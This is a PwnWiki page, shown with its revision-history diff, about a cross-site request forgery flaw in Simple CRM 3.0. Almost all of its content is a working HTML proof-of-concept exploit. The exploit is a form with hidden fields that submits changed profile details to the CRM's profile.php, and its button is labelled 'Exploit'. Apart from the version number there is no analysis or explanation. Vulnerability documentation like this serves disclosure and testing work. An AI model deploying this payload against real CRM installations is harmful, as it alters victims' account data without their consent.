Difference between revisions of "Simple CRM 3.0 CSRF漏洞"
From PwnWiki
(Created page with "<languages /> <translate> ==漏洞影響== </translate> Version: 3.0 ==POC== <pre> <html> <body> <script>history.pushState('', '', '/')</script> <form action="http://...") |
(Marked this version for translation) |
||
| Line 1: | Line 1: | ||
<languages /> | <languages /> | ||
<translate> | <translate> | ||
| − | ==漏洞影響== | + | ==漏洞影響== <!--T:1--> |
</translate> | </translate> | ||
Version: 3.0 | Version: 3.0 | ||
Latest revision as of 21:52, 21 June 2021
漏洞影響
Version: 3.0
POC
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://localhost/crm/profile.php" method="POST" enctype="multipart/form-data">
<input type="hidden" name="name" value="test" />
<input type="hidden" name="alt_email" value="" />
<input type="hidden" name="phone" value="0123456789" />
<input type="hidden" name="gender" value="m" />
<input type="hidden" name="address" value="jgjgjgjjggjcsrf" />
<input type="hidden" name="update" value="Update" />
<input type="submit" value="Exploit" />
</form>
</body>
</html>
